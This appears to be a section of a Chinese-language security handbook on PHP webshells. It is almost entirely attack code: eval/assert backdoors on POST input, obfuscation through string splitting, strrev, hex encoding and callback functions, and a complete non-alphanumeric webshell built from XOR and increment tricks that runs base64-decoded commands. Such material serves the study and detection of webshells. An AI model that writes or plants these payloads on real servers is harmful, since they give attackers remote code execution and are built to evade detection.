4.1.7. WebShell¶

4.1.7.1. 常见变形¶

GLOBALS eval($GLOBALS['_POST']['op']); $_FILE eval($_FILE['name']); 拆分 assert(${"_PO"."ST"} ['sz']); 动态函数执行 $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']); create_function $function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function(); preg_replacerot13base64 进制转化 "\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145" 利用文件名 __FILE__

4.1.7.2. 字符串变形函数¶

ucwordsucfirsttrimsubstr_replacesubstrstrtrstrtoupperstrtolowerstrtokstr_rot13

4.1.7.3. 回调函数¶

call_user_func_arraycall_user_funcarray_filterarray_walkarray_mapregistregister_shutdown_functionregister_tick_functionfilter_varfilter_var_arrayuasortuksortarray_reducearray_walkarray_walk_recursive

4.1.7.4. 特殊字符Shell¶

PHP的字符串可以在进行异或、自增运算的时候，会直接进行运算，故可以使用特殊字符来构成Shell。

@$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); @${$__}[!$_](${$__}[$_]); $_=[]; $_=@"$_"; // $_='Array'; $_=$_['!'=='@']; // $_=$_[0]; $___=$_; // A $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; $___.=$__; // S $___.=$__; // S $__=$_; $__++;$__++;$__++;$__++; // E $___.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R $___.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T $___.=$__; $____='_'; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T $____.=$__; $_=$$____; $___(base64_decode($_[_]));